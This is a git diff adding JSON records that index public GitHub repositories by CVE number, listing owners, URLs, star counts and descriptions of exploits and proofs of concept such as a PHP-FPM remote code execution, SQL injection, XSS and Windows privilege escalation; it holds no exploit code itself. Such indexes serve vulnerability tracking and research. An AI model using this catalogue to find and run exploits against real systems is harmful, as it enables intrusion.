"allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1068.json b/2019/CVE-2019-1068.json new file mode 100644 index 0000000000..098936a63c --- /dev/null +++ b/2019/CVE-2019-1068.json @@ -0,0 +1,41 @@ +[ + { + "id": 336089774, + "name": "CVE-2019-1068", + "full_name": "Vulnerability-Playground\/CVE-2019-1068", + "owner": { + "login": "Vulnerability-Playground", + "id": 66919430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66919430?v=4", + "html_url": "https:\/\/github.com\/Vulnerability-Playground", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnerability-Playground\/CVE-2019-1068", + "description": "Root cause analysis and PoC for a Microsoft SQL Server Stack Overflow Vulnerability by reversing svl.dll.", + "fork": false, + "created_at": "2021-02-04T21:40:56Z", + "updated_at": "2021-11-10T23:23:53Z", + "pushed_at": "2021-11-10T23:23:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "analysis", + "cve-2019-1068", + "diff", + "dos", + "patch", + "poc", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10685.json b/2019/CVE-2019-10685.json new file mode 100644 index 0000000000..5e32e47709 --- /dev/null +++ b/2019/CVE-2019-10685.json @@ -0,0 +1,33 @@ +[ + { + "id": 179077030, + "name": "CVE-2019-10685", + "full_name": "alt3kx\/CVE-2019-10685", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2019-10685", + "description": "A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6", + "fork": false, + "created_at": "2019-04-02T12:50:46Z", + "updated_at": "2024-08-12T19:47:32Z", + "pushed_at": "2019-05-07T11:50:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1069.json b/2019/CVE-2019-1069.json new file mode 100644 index 0000000000..e3451d3baa --- /dev/null +++ b/2019/CVE-2019-1069.json @@ -0,0 +1,37 @@ +[ + { + "id": 189962146, + "name": "SharpPolarBear", + "full_name": "S3cur3Th1sSh1t\/SharpPolarBear", + "owner": { + "login": "S3cur3Th1sSh1t", + "id": 27858067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27858067?v=4", + "html_url": "https:\/\/github.com\/S3cur3Th1sSh1t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S3cur3Th1sSh1t\/SharpPolarBear", + "description": "Privesc through import of Sheduled tasks + Hardlinks - CVE-2019-1069", + "fork": false, + "created_at": "2019-06-03T08:07:32Z", + "updated_at": "2024-08-12T19:49:38Z", + "pushed_at": "2019-06-26T11:53:08Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-1069", + "privesc", + "privilege-escalation-exploits" + ], + "visibility": "public", + "forks": 15, + "watchers": 34, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10708.json b/2019/CVE-2019-10708.json new file mode 100644 index 0000000000..fe65dd9356 --- /dev/null +++ b/2019/CVE-2019-10708.json @@ -0,0 +1,33 @@ +[ + { + "id": 202295806, + "name": "CVE-2019-10708", + "full_name": "stavhaygn\/CVE-2019-10708", + "owner": { + "login": "stavhaygn", + "id": 17663058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17663058?v=4", + "html_url": "https:\/\/github.com\/stavhaygn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stavhaygn\/CVE-2019-10708", + "description": "CVE-2019-10708 SQL injection PoC", + "fork": false, + "created_at": "2019-08-14T07:15:58Z", + "updated_at": "2024-08-12T19:51:58Z", + "pushed_at": "2019-08-18T10:17:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10742.json b/2019/CVE-2019-10742.json new file mode 100644 index 0000000000..966a55d5a3 --- /dev/null +++ b/2019/CVE-2019-10742.json @@ -0,0 +1,33 @@ +[ + { + "id": 507450005, + "name": "CVE-2019-10742", + "full_name": "Viniciuspxf\/CVE-2019-10742", + "owner": { + "login": "Viniciuspxf", + "id": 54479728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54479728?v=4", + "html_url": "https:\/\/github.com\/Viniciuspxf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Viniciuspxf\/CVE-2019-10742", + "description": null, + "fork": false, + "created_at": "2022-06-26T01:14:56Z", + "updated_at": "2022-06-26T01:21:31Z", + "pushed_at": "2022-06-26T19:14:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10758.json b/2019/CVE-2019-10758.json new file mode 100644 index 0000000000..e0090c9372 --- /dev/null +++ b/2019/CVE-2019-10758.json @@ -0,0 +1,64 @@ +[ + { + "id": 230212773, + "name": "CVE-2019-10758", + "full_name": "masahiro331\/CVE-2019-10758", + "owner": { + "login": "masahiro331", + "id": 20438853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20438853?v=4", + "html_url": "https:\/\/github.com\/masahiro331", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/masahiro331\/CVE-2019-10758", + "description": null, + "fork": false, + "created_at": "2019-12-26T06:58:56Z", + "updated_at": "2024-08-12T19:56:02Z", + "pushed_at": "2019-12-26T08:44:54Z", + "stargazers_count": 111, + "watchers_count": 111, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 111, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 231926488, + "name": "CVE-2019-10758", + "full_name": "lp008\/CVE-2019-10758", + "owner": { + "login": "lp008", + "id": 11436275, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11436275?v=4", + "html_url": "https:\/\/github.com\/lp008", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lp008\/CVE-2019-10758", + "description": "CVE-2019-10758", + "fork": false, + "created_at": "2020-01-05T14:05:56Z", + "updated_at": "2024-08-12T19:56:19Z", + "pushed_at": "2020-01-05T14:21:15Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10760.json b/2019/CVE-2019-10760.json new file mode 100644 index 0000000000..64565604cf --- /dev/null +++ b/2019/CVE-2019-10760.json @@ -0,0 +1,33 @@ +[ + { + "id": 782952193, + "name": "safer-eval-cve-CVE-2019-10760", + "full_name": "lirantal\/safer-eval-cve-CVE-2019-10760", + "owner": { + "login": "lirantal", + "id": 316371, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/316371?v=4", + "html_url": "https:\/\/github.com\/lirantal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lirantal\/safer-eval-cve-CVE-2019-10760", + "description": "Publicly disclosed Proof-of-Concept (POC) exploit for the safer-eval@1.3.1 version", + "fork": false, + "created_at": "2024-04-06T14:13:43Z", + "updated_at": "2024-04-25T20:11:28Z", + "pushed_at": "2024-04-25T20:11:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10779.json b/2019/CVE-2019-10779.json new file mode 100644 index 0000000000..46ddb28a68 --- /dev/null +++ b/2019/CVE-2019-10779.json @@ -0,0 +1,33 @@ +[ + { + "id": 308459174, + "name": "CVE-2019-10779", + "full_name": "RepublicR0K\/CVE-2019-10779", + "owner": { + "login": "RepublicR0K", + "id": 73670332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73670332?v=4", + "html_url": "https:\/\/github.com\/RepublicR0K", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RepublicR0K\/CVE-2019-10779", + "description": "GCHQ Stroom is vulnerable to Cross-Site Scripting due to the ability to load the Stroom dashboard on another site and insufficient protection against window event origins.", + "fork": false, + "created_at": "2020-10-29T21:56:32Z", + "updated_at": "2024-06-25T17:12:33Z", + "pushed_at": "2020-10-29T21:57:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1083.json b/2019/CVE-2019-1083.json new file mode 100644 index 0000000000..49a0264405 --- /dev/null +++ b/2019/CVE-2019-1083.json @@ -0,0 +1,33 @@ +[ + { + "id": 263709537, + "name": "HowCVE-2019-1083Works", + "full_name": "stevenseeley\/HowCVE-2019-1083Works", + "owner": { + "login": "stevenseeley", + "id": 1301421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1301421?v=4", + "html_url": "https:\/\/github.com\/stevenseeley", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stevenseeley\/HowCVE-2019-1083Works", + "description": null, + "fork": false, + "created_at": "2020-05-13T18:17:19Z", + "updated_at": "2022-08-11T21:35:52Z", + "pushed_at": "2020-05-13T18:17:24Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10869.json b/2019/CVE-2019-10869.json new file mode 100644 index 0000000000..802cd3a812 --- /dev/null +++ b/2019/CVE-2019-10869.json @@ -0,0 +1,33 @@ +[ + { + "id": 186229171, + "name": "CVE-2019-10869", + "full_name": "KTN1990\/CVE-2019-10869", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2019-10869", + "description": "(Wordpress) Ninja Forms File Uploads Extension <= 3.0.22 – Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2019-05-12T08:20:16Z", + "updated_at": "2024-08-12T19:48:48Z", + "pushed_at": "2019-05-17T10:41:43Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10915.json b/2019/CVE-2019-10915.json new file mode 100644 index 0000000000..348bb0074e --- /dev/null +++ b/2019/CVE-2019-10915.json @@ -0,0 +1,33 @@ +[ + { + "id": 198133475, + "name": "CVE-2019-10915", + "full_name": "jiansiting\/CVE-2019-10915", + "owner": { + "login": "jiansiting", + "id": 28823754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28823754?v=4", + "html_url": "https:\/\/github.com\/jiansiting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jiansiting\/CVE-2019-10915", + "description": "Siemens TIA administrator Tool RCE", + "fork": false, + "created_at": "2019-07-22T02:38:54Z", + "updated_at": "2024-08-12T19:51:16Z", + "pushed_at": "2019-07-22T11:48:39Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10945.json b/2019/CVE-2019-10945.json new file mode 100644 index 0000000000..50a433972d --- /dev/null +++ b/2019/CVE-2019-10945.json @@ -0,0 +1,33 @@ +[ + { + "id": 605992634, + "name": "CVE-2019-10945", + "full_name": "dpgg101\/CVE-2019-10945", + "owner": { + "login": "dpgg101", + "id": 16139822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16139822?v=4", + "html_url": "https:\/\/github.com\/dpgg101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dpgg101\/CVE-2019-10945", + "description": "Joomla! Core 1.5.0 - 3.9.4 - Directory Traversal \/ Authenticated Arbitrary File Deletion in Python3", + "fork": false, + "created_at": "2023-02-24T10:58:53Z", + "updated_at": "2024-10-14T17:22:30Z", + "pushed_at": "2023-02-27T16:32:59Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1096.json b/2019/CVE-2019-1096.json new file mode 100644 index 0000000000..f2fe818c49 --- /dev/null +++ b/2019/CVE-2019-1096.json @@ -0,0 +1,33 @@ +[ + { + "id": 198785536, + "name": "cve-2019-1096-poc", + "full_name": "CrackerCat\/cve-2019-1096-poc", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/cve-2019-1096-poc", + "description": null, + "fork": false, + "created_at": "2019-07-25T07:58:44Z", + "updated_at": "2020-08-17T10:36:33Z", + "pushed_at": "2019-07-25T07:24:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10999.json b/2019/CVE-2019-10999.json new file mode 100644 index 0000000000..00bcb945c9 --- /dev/null +++ b/2019/CVE-2019-10999.json @@ -0,0 +1,80 @@ +[ + { + "id": 167200399, + "name": "CVE-2019-10999", + "full_name": "tacnetsol\/CVE-2019-10999", + "owner": { + "login": "tacnetsol", + "id": 68755478, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68755478?v=4", + "html_url": "https:\/\/github.com\/tacnetsol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tacnetsol\/CVE-2019-10999", + "description": "Full exploit for D-Link DCS-5020L, POC crash for others that are vulnerable as well. ", + "fork": false, + "created_at": "2019-01-23T14:53:19Z", + "updated_at": "2024-10-29T21:23:59Z", + "pushed_at": "2022-08-28T08:21:26Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve-2019-10999", + "dcs-5009l", + "dcs-5010l", + "dcs-5020l", + "dcs-5025l", + "dcs-5030l", + "dcs-930l", + "dcs-931l", + "dcs-932l", + "dcs-933l", + "dcs-934l", + "dlink-cameras", + "exploitation", + "mips-exploitation" + ], + "visibility": "public", + "forks": 11, + "watchers": 39, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467862315, + "name": "CVE-2019-10999", + "full_name": "qjh2333\/CVE-2019-10999", + "owner": { + "login": "qjh2333", + "id": 97860473, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97860473?v=4", + "html_url": "https:\/\/github.com\/qjh2333", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qjh2333\/CVE-2019-10999", + "description": null, + "fork": false, + "created_at": "2022-03-09T09:35:15Z", + "updated_at": "2022-03-09T09:35:15Z", + "pushed_at": "2022-03-09T09:43:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11043.json b/2019/CVE-2019-11043.json new file mode 100644 index 0000000000..117f49c80d --- /dev/null +++ b/2019/CVE-2019-11043.json @@ -0,0 +1,703 @@ +[ + { + "id": 210457246, + "name": "phuip-fpizdam", + "full_name": "neex\/phuip-fpizdam", + "owner": { + "login": "neex", + "id": 684237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/684237?v=4", + "html_url": "https:\/\/github.com\/neex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/neex\/phuip-fpizdam", + "description": "Exploit for CVE-2019-11043", + "fork": false, + "created_at": "2019-09-23T21:37:27Z", + "updated_at": "2024-11-25T09:16:17Z", + "pushed_at": "2019-11-12T18:53:14Z", + "stargazers_count": 1797, + "watchers_count": 1797, + "has_discussions": false, + "forks_count": 249, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 249, + "watchers": 1797, + "score": 0, + "subscribers_count": 37 + }, + { + "id": 217065303, + "name": "CVE-2019-11043", + "full_name": "B1gd0g\/CVE-2019-11043", + "owner": { + "login": "B1gd0g", + "id": 49259860, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49259860?v=4", + "html_url": "https:\/\/github.com\/B1gd0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B1gd0g\/CVE-2019-11043", + "description": "CVE-2019-11043", + "fork": false, + "created_at": "2019-10-23T13:32:14Z", + "updated_at": "2024-08-12T19:54:10Z", + "pushed_at": "2019-10-23T13:35:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 217065801, + "name": "CVE-2019-11043", + "full_name": "tinker-li\/CVE-2019-11043", + "owner": { + "login": "tinker-li", + "id": 41416976, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41416976?v=4", + "html_url": "https:\/\/github.com\/tinker-li", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tinker-li\/CVE-2019-11043", + "description": null, + "fork": false, + "created_at": "2019-10-23T13:34:28Z", + "updated_at": "2024-08-12T19:54:10Z", + "pushed_at": "2019-10-23T13:41:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 217171261, + "name": "CVE-2019-11043", + "full_name": "jas502n\/CVE-2019-11043", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-11043", + "description": "php-fpm+Nginx RCE", + "fork": false, + "created_at": "2019-10-23T23:26:57Z", + "updated_at": "2024-10-30T08:09:01Z", + "pushed_at": "2020-08-20T04:43:25Z", + "stargazers_count": 101, + "watchers_count": 101, + "has_discussions": false, + "forks_count": 37, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 37, + "watchers": 101, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 217218372, + "name": "PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-", + "full_name": "AleWong\/PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-", + "owner": { + "login": "AleWong", + "id": 13904980, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13904980?v=4", + "html_url": "https:\/\/github.com\/AleWong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AleWong\/PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-", + "description": "PHP-FPM Remote Code Execution Vulnerability (CVE-2019-11043) POC in Python", + "fork": false, + "created_at": "2019-10-24T05:28:41Z", + "updated_at": "2024-08-12T19:54:11Z", + "pushed_at": "2020-07-06T02:47:12Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 217257852, + "name": "CVE-2019-11043", + "full_name": "ianxtianxt\/CVE-2019-11043", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2019-11043", + "description": null, + "fork": false, + "created_at": "2019-10-24T09:09:01Z", + "updated_at": "2024-08-12T19:54:12Z", + "pushed_at": "2019-10-24T09:12:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 217258558, + "name": "CVE-2019-11043", + "full_name": "fairyming\/CVE-2019-11043", + "owner": { + "login": "fairyming", + "id": 44915879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44915879?v=4", + "html_url": "https:\/\/github.com\/fairyming", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fairyming\/CVE-2019-11043", + "description": null, + "fork": false, + "created_at": "2019-10-24T09:12:38Z", + "updated_at": "2024-08-12T19:54:12Z", + "pushed_at": "2019-10-24T10:04:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 217294430, + "name": "CVE-2019-11043-Docker", + "full_name": "akamajoris\/CVE-2019-11043-Docker", + "owner": { + "login": "akamajoris", + "id": 4648441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4648441?v=4", + "html_url": "https:\/\/github.com\/akamajoris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akamajoris\/CVE-2019-11043-Docker", + "description": null, + "fork": false, + "created_at": "2019-10-24T12:32:02Z", + "updated_at": "2024-08-12T19:54:12Z", + "pushed_at": "2019-10-28T10:23:17Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 27, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 218028044, + "name": "CVE-2019-11043", + "full_name": "theMiddleBlue\/CVE-2019-11043", + "owner": { + "login": "theMiddleBlue", + "id": 4454961, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4454961?v=4", + "html_url": "https:\/\/github.com\/theMiddleBlue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theMiddleBlue\/CVE-2019-11043", + "description": "(PoC) Python version of CVE-2019-11043 exploit by neex", + "fork": false, + "created_at": "2019-10-28T11:09:06Z", + "updated_at": "2024-10-20T22:52:08Z", + "pushed_at": "2019-10-29T15:47:02Z", + "stargazers_count": 144, + "watchers_count": 144, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 45, + "watchers": 144, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 218080163, + "name": "cve-2019-11043", + "full_name": "shadow-horse\/cve-2019-11043", + "owner": { + "login": "shadow-horse", + "id": 5432330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5432330?v=4", + "html_url": "https:\/\/github.com\/shadow-horse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shadow-horse\/cve-2019-11043", + "description": "CVE-2019-11043 PHP远程代码执行", + "fork": false, + "created_at": "2019-10-28T15:31:34Z", + "updated_at": "2024-08-12T19:54:19Z", + "pushed_at": "2019-10-29T15:39:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 218269194, + "name": "CVE-2019-11043", + "full_name": "huowen\/CVE-2019-11043", + "owner": { + "login": "huowen", + "id": 31957041, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31957041?v=4", + "html_url": "https:\/\/github.com\/huowen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huowen\/CVE-2019-11043", + "description": "Python exp for CVE-2019-11043", + "fork": false, + "created_at": "2019-10-29T11:16:12Z", + "updated_at": "2024-08-12T19:54:21Z", + "pushed_at": "2019-10-30T06:19:21Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 218500391, + "name": "docker-CVE-2019-11043", + "full_name": "ypereirareis\/docker-CVE-2019-11043", + "owner": { + "login": "ypereirareis", + "id": 6838923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6838923?v=4", + "html_url": "https:\/\/github.com\/ypereirareis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ypereirareis\/docker-CVE-2019-11043", + "description": "Docker image and commands to check CVE-2019-11043 vulnerability on nginx\/php-fpm applications.", + "fork": false, + "created_at": "2019-10-30T10:22:41Z", + "updated_at": "2024-08-12T19:54:23Z", + "pushed_at": "2019-10-30T12:53:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-11043", + "docker", + "dockerfile", + "nginx", + "php", + "php-fpm", + "php7", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 220021213, + "name": "CVE-2019-11043", + "full_name": "MRdoulestar\/CVE-2019-11043", + "owner": { + "login": "MRdoulestar", + "id": 18137763, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18137763?v=4", + "html_url": "https:\/\/github.com\/MRdoulestar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MRdoulestar\/CVE-2019-11043", + "description": "CVE-2019-11043 && PHP7.x && RCE EXP", + "fork": false, + "created_at": "2019-11-06T14:53:13Z", + "updated_at": "2024-08-12T19:54:36Z", + "pushed_at": "2019-11-06T15:24:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 220032292, + "name": "CVE-2019-11043", + "full_name": "0th3rs-Security-Team\/CVE-2019-11043", + "owner": { + "login": "0th3rs-Security-Team", + "id": 57450857, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57450857?v=4", + "html_url": "https:\/\/github.com\/0th3rs-Security-Team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0th3rs-Security-Team\/CVE-2019-11043", + "description": "CVE-2019-11043 PHP7.x RCE", + "fork": false, + "created_at": "2019-11-06T15:44:47Z", + "updated_at": "2024-08-12T19:54:36Z", + "pushed_at": "2019-11-06T15:48:18Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 220966609, + "name": 